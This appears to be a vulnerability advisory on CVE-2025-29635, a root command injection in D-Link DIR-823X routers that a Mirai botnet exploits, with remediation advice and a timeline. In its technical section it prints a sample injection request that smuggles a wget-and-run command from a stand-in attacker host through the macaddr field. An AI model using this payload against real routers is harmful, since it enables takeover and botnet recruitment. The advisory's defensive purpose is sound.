What is the D-Link DIR-823X?
The D-Link DIR-823X is an AX3000 dual-band Wi-Fi 6 (802.11ax) router targeted at home users and small offices. Like most consumer-grade D-Link routers, it gained wide deployment due to its low price point and broad ISP bundling.
D-Link routers are perennial targets for Mirai-family botnets. Once compromised, they are recruited into DDoS-for-hire infrastructure. Because these devices sit at the network edge with internet-facing management interfaces, a single exploitable vulnerability can affect thousands of homes and small businesses simultaneously.
Overview
CVE-2025-29635 is a command injection (CWE-77) vulnerability in the web management interface of the D-Link DIR-823X router. An attacker who can send a POST request to the /goform/set_prohibiting endpoint can inject arbitrary OS commands that execute with root privileges on the router.
By early March 2026, a Mirai botnet variant called "tuxnokill" was actively exploiting this flaw — roughly one year after public disclosure — to conscript EoL D-Link routers into a DDoS botnet.
Affected Versions
| Firmware Version | Status |
|---|---|
| 240126 | Vulnerable — no patch |
| 240802 | Vulnerable — no patch |
| All versions | No fix planned (EoL device) |
Technical Details
The vulnerability resides in the /goform/set_prohibiting handler in the router's web server. The macaddr POST parameter is copied into a command buffer via snprintf() without any sanitization, then passed directly to system() for execution:
POST /goform/set_prohibiting HTTP/1.1
...
macaddr=; wget http://attacker.com/payload.sh -O /tmp/x; sh /tmp/x ;
Because the router's web process runs as root, the injected command executes with full system privileges. The attack requires admin credentials (CVSS marks Privileges Required: High), but in practice D-Link routers are frequently left on default credentials, making authentication a low barrier.
CWE-77 (Command Injection) is distinct from OS Command Injection (CWE-78) in that the command string itself is manipulated rather than shell metacharacters alone — though the practical exploitation is similar.
Discovery
Discovered and reported by Wang Jinshuai and Zhao Jiangting. A public PoC was briefly available on GitHub before being removed.
Exploitation Context
Mirai "tuxnokill" Campaign
In early March 2026, Akamai SIRT analysts detected active exploitation attempts against CVE-2025-29635 via their global honeypot network. The campaign delivers a Mirai-variant dropper named tuxnokill:
- Attackers send crafted POST requests to download and execute
dlink.shfrom attacker-controlled infrastructure - The dropper contacts a C2 server at
64.89.161[.]130:44300 - The payload uses XOR encoding (key
0x30) — standard Mirai obfuscation - Infected routers are added to a botnet used for large-scale DDoS attacks
The same threat actor simultaneously exploited CVE-2023-1389 (TP-Link AX21) and a ZTE ZXV10 H108L RCE, indicating a systematic campaign targeting multiple EoL consumer routers.
Why EoL Devices Are Prime Botnet Targets
EoL routers represent ideal botnet fodder: they have permanent, unpatched vulnerabilities; they are internet-connected 24/7; their owners rarely monitor them; and there is no vendor mechanism to push patches. The one-year delay between disclosure (March 2025) and mass exploitation (March 2026) is typical — attackers wait for honeypot noise to die down before launching sustained campaigns.
Remediation
- Replace the DIR-823X immediately. D-Link's official recommendation (SAP10469) is to retire and replace the device. Any replacement should be a currently supported model with an active patch lifecycle.
- Disable remote management — if you cannot replace the device immediately, disable WAN-side access to the management interface. This blocks network-reachable exploitation but does not protect against LAN-side attacks.
- Change default admin credentials — this raises the bar above completely unauthenticated attacks (the CVSS score requires High privileges, but many devices use default
admin/admin). - Monitor your network for unusual outbound traffic to unknown IPs — a compromised router will beacon to its C2.
- Review D-Link's EoL list for other devices in your environment: https://www.dlink.com/en/end-of-life-policy
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-29635 |
| Vendor / Product | D-Link — DIR-823X |
| NVD Published | 2025-03-25 |
| NVD Last Modified | 2026-04-24 |
| CVSS 3.1 Score | 7.2 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| Severity | HIGH |
| CWE | CWE-77 — Improper Neutralization of Special Elements used in a Command |
| CISA KEV Added | 2026-04-24 |
| CISA KEV Deadline | 2026-05-08 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2025-03-11 | CVE reserved |
| 2025-03-25 | CVE published |
| 2026-03-01 | Active exploitation detected by Akamai SIRT honeypots — Mirai 'tuxnokill' campaign |
| 2026-04-24 | Added to CISA Known Exploited Vulnerabilities Catalog |
| 2026-05-08 | CISA BOD 22-01 remediation deadline — discontinue use |
References
| Resource | Type |
|---|---|
| NVD — CVE-2025-29635 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| D-Link Security Advisory SAP10469 — DIR-823X End-of-Life / EoS | Vendor Advisory |
| CVE-2025-29635: Mirai Campaign Targets D-Link Devices — Akamai SIRT | Security Research |
| New Mirai campaign exploits RCE flaw in EoL D-Link routers — BleepingComputer | News |
| Mirai botnet exploits CVE-2025-29635 to target legacy D-Link routers — Security Affairs | News |
| CWE-77 — Improper Neutralization of Special Elements used in a Command | Weakness Classification |